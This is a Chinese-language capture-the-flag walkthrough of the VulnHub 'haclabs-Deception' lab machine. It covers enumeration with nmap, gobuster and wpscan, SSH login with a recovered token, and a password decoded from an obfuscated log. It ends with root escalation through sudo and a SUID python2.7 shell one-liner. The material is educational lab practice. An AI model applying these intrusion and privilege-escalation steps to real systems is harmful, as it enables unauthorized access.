靶机系列测试 haclabs-Deception

admin 2022年5月11日10:53:51安全文章评论5 views3225字阅读10分45秒阅读模式
靶机系列测试 haclabs-Deception
点击上方蓝字  关注我们

靶机系列测试 haclabs-Deception

1
介绍

最近暗月在每个星期六都有一个网络公开课,主要是技术分享,有需要的朋友关注公众号,今天这篇文章是昨晚做公开课的技术文档,会把一些技术细节分享在这里,这可能与直播有点出入,因为直播问题比较多,因此会更加详细。

2
靶机介绍

描述 详细
Difficulty Easy to Intermediate
Description This a beginner level machine , getting a shell is a little bit harder, just think out of the box to get the shell.privilege escalation is easy once you get the shell.This machine has 3 flags. Each flag is present in the Home directory of particular user. Be ready to test your Linux skills.
Flag 3

下载地址:

https://www.vulnhub.com/entry/haclabs-deception,427/

3
靶机测试过程
3.1  信息收集
3.1.1 nmap扫描
nmap -sC -sV 192.168.0.191 -oA deception-port -Pn

靶机系列测试 haclabs-Deception


2.1  访问主页

访问ip是一个Ubuntu apache的默认主页 根据扫描软件 发现主页的存在wordpress 再用扫描工具探测软件下是否存在其他敏感文件。

http://192.168.0.191/

http://192.168.0.191/wordpress

靶机系列测试 haclabs-Deception

3.3  目录扫描

gobuster dir -u http://192.168.0.191/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php,html" -t 100

靶机系列测试 haclabs-Deception

/index.php (Status: 301)

/wp-content (Status: 301)

/wp-login.php (Status: 200)

/wp-includes (Status: 301)

/readme.html (Status: 200)

/robots.html (Status: 200)

/wp-trackback.php (Status: 200)

/wp-admin (Status: 301)

/wp-signup.php (Status: 302)

/hint.html (Status: 200)

http://192.168.0.191/wordpress//robots.html

靶机系列测试 haclabs-Deception

http://192.168.0.191/wordpress//hint.html

靶机系列测试 haclabs-Deception

Please collect all the API tokens availabe on the home page

请收集主页上所有可用的API令牌

3.4  收集api令牌

靶机系列测试 haclabs-Deception

靶机系列测试 haclabs-Deception

靶机系列测试 haclabs-Deception

token api

5F4DCC3B5AA765D61D8327DEB882CF99

这个解密就是password 可能这个就是密码。

3.5 收集wordpress账号

wpscan --url http://192.168.0.191/wordpress -e u

靶机系列测试 haclabs-Deception

3.6 ssh登录

密码5F4DCC3B5AA765D61D8327DEB882CF99

ssh [email protected]

靶机系列测试 haclabs-Deception

3.7 获取第一个flag

靶机系列测试 haclabs-Deception

3.8 获取haclabs 密码

靶机系列测试 haclabs-Deception

cat .systemlogs

ssdsdsdsdsdqwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklqwertyuiop1234567890qazxdswedcfrfgvbhyyhnkiollokmkijnjuyhbhytgvfrdcxdesxzsyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklzaq123456vfr4567890mnbvcde4567890yuiopasdfghjklzxcvbnmzxcvbnmasdfghjklmnbvcxzsaq234567890-098765rewsxcvbnm,[email protected]#[email protected]#$fdjferheirdfdfksdjhfsg24356789yuiopasdfghjklzxcvbnmzxcvbnmasdfghjkljdfivnd"haclabs"jsdskdjskdjsldsklfjlkfdgl/dsfgkdhfgkdfgdjfhkagdhkdhgkkdzfkgdhfffgkhsfhgkdfhgkjlsfladjsflslfjlaaakjdflkaejflyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklNDmsfmbwebrm43564576nu4r50q824305485103601856035860020^&*()sdjfsdflsdfaldjfleragkrjgkfdghdfhksjdhgsghkskskfskgkshkshksfhkgkrtho43euvnd,m,mnhjkjhgfdrtfghj,;poiuytgbvftyhjkllksjhgdfrteuyue"A=123456789"fdsgfhndsffjladjksfjlsdfjlfghfieruyiehgkfnjuyhbvcftyu789876543wsxcvbnm,mju76543asxcferfgbnm,klokjhgbvcxsdfklsdfweri34o58uwotueagsdgjlyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklwlarqlewairp3wi4te0596q03496tiquieljkgrelrsjto5euyjgeldfhqowe5uy4seyjelsdglsoh45yeujhskehgesjhgsyuiopasdfghjklzxcvbnmzxcvbnmasdfghjkldsklflssldfjlsdfjsldfjsldfjld"+A[::-1]"fjlsdnvsldvnsujnhgfqwertyuioplkjhgfdsazxcvbnm,mnbvcxzasdfghjkl;poiuytrewqazxsedcvftghnklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjkldjfkdslfjsldfjsldfjlw4o32894829348293489289389

靶机系列测试 haclabs-Deception

haclabs A=123456789 +A[::-1]

靶机系列测试 haclabs-Deception

密码可能是haclabs 987654321 haclabs987654321

密码haclabs987654321

su haclabs

靶机系列测试 haclabs-Deception

3.9 获取第二个flag

靶机系列测试 haclabs-Deception靶机系列测试 haclabs-Deception

3.10 特权提升

3.1.1  sudo提权

sudo -l

靶机系列测试 haclabs-Deception

看到输入密码就可以执行任何命令

靶机系列测试 haclabs-Deception

3.10.2 suid提权

find / -type f -perm -u=s 2>/dev/null

靶机系列测试 haclabs-Deception

/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'

靶机系列测试 haclabs-Deception

3.11,获取第三个flag

靶机系列测试 haclabs-Deception

4
关注公众号

如果本人你对有用,请点击收藏和分享。你的支持是我们的动力。

关注本公众号 不定期更新干货。

靶机系列测试 haclabs-Deception



原文始发于微信公众号(moonsec):靶机系列测试 haclabs-Deception

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月11日10:53:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  靶机系列测试 haclabs-Deception http://cn-sec.com/archives/565541.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: